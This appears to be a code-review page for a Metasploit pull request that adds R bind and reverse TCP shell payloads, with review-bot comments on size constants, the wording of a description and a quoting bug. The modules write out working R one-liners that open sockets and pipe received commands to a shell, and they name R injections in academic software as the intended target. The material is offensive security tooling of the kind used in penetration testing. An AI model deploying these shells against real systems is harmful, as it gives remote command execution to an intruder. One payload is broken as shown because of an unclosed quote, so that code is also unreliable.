Reverse and bind shells in R
Initial implementation of bind and reverse TCP shells in R. Supports IPv4 and IPv6, and provides stateless sessions which won't change the cwd when cd is invoked, since each command line is executed through its own newly spawned pipe. R injections are common in academic software written in a hurry by students or lab administrators. The language runtimes are also commonly found adjacent to valuable data, and are often used by teams which are not directly responsible for information security. Testing: Local testing with netcat bind and rev handlers. TODO: Add the appropriate platform/language library definitions
bug/bundler_fix
parent
6ecdb8f2cc
commit
d76616e8e8
|
@ -0,0 +1,43 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core/payload/r'
|
||||||
|
require 'msf/core/handler/bind_tcp'
|
||||||
|
require 'msf/base/sessions/command_shell'
|
||||||
|
require 'msf/base/sessions/command_shell_options'
|
||||||
|
|
||||||
|
module MetasploitModule
|
||||||
|
|
||||||
|
CachedSize = 516
|
||||||
|
|
||||||
|
include Msf::Payload::Single
|
||||||
|
include Msf::Payload::R
|
||||||
|
include Msf::Sessions::CommandShellOptions
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'R Command Shell, Bind TCP',
|
||||||
|
'Description' => 'Continually listen for a connection and spawn a command shell via R',
|
||||||
|
'Author' => [ 'RageLtMan' ],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'r',
|
||||||
|
'Arch' => ARCH_R,
|
||||||
|
'Handler' => Msf::Handler::BindTcp,
|
||||||
|
'Session' => Msf::Sessions::CommandShell,
|
||||||
|
'PayloadType' => 'r',
|
||||||
|
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
|
||||||
|
))
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate
|
||||||
|
return prepends(r_string)
|
||||||
|
end
|
||||||
|
|
||||||
|
def r_string
|
||||||
|
return "s<-socketConnection(port=#{datastore['LPORT']}," +
|
||||||
|
"blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +
|
||||||
|
"(pipe(readLines(s,1))),s)}"
|
||||||
|
end
|
||||||
|
end
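Review bot: `CachedSize = 516` is identical in this file and in the reverse TCP file in the next section, although the two `r_string` bodies differ in length (the reverse variant also interpolates LHOST), so at least one of the two values cannot be a measured size. Both constants should be regenerated with the framework's cached-size tooling rather than copied, since a stale value is typically caught only later by the payload size specs. Separately, the `Description` says "Continually listen", while `r_string` calls `socketConnection` once before the `while(TRUE)` loop, so the module appears to serve a single connection. Either the wording or a short comment above `r_string` should state that, for example `# Accepts one connection; each received line is run through its own pipe, so no state (cwd, env) persists between commands.`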
|
|
@ -0,0 +1,45 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core/payload/r'
|
||||||
|
require 'msf/core/handler/reverse_tcp'
|
||||||
|
require 'msf/base/sessions/command_shell'
|
||||||
|
require 'msf/base/sessions/command_shell_options'
|
||||||
|
|
||||||
|
module MetasploitModule
|
||||||
|
|
||||||
|
CachedSize = 516
|
||||||
|
|
||||||
|
include Msf::Payload::Single
|
||||||
|
include Msf::Payload::R
|
||||||
|
include Msf::Sessions::CommandShellOptions
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'R Command Shell, Reverse TCP',
|
||||||
|
'Description' => 'Connect back and create a command shell via R',
|
||||||
|
'Author' => [ 'RageLtMan' ],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'r',
|
||||||
|
'Arch' => ARCH_R,
|
||||||
|
'Handler' => Msf::Handler::ReverseTcp,
|
||||||
|
'Session' => Msf::Sessions::CommandShell,
|
||||||
|
'PayloadType' => 'r',
|
||||||
|
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
|
||||||
|
))
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate
|
||||||
|
return prepends(r_string)
|
||||||
|
end
|
||||||
|
|
||||||
|
def r_string
|
||||||
|
lhost = datastore['LHOST']
|
||||||
|
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
|
||||||
|
return "s<-socketConnection(host='#{lhost},port=#{datastore['LPORT']}," +
|
||||||
|
"blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +
|
||||||
|
"(pipe(readLines(s, 1))),s)}"
|
||||||
|
end
|
||||||
|
end
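Review bot: The single quote opened before the interpolated LHOST in `r_string` is never closed (`host='#{lhost},port=`), so the generated R text has unbalanced quotes and will not parse as written. The fragment should read `host='#{lhost}',port=#{datastore['LPORT']},`. `LHOST` and `LPORT` are also spliced into the generated source without any coercion. Using `datastore['LPORT'].to_i` and rejecting an `LHOST` that contains a quote character would keep an unexpected option value from altering the generated code. A spec that asserts on the output of `generate` for one IPv4 and one IPv6 address would catch both problems and would also document the bracket-wrapping of IPv6 literals.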
|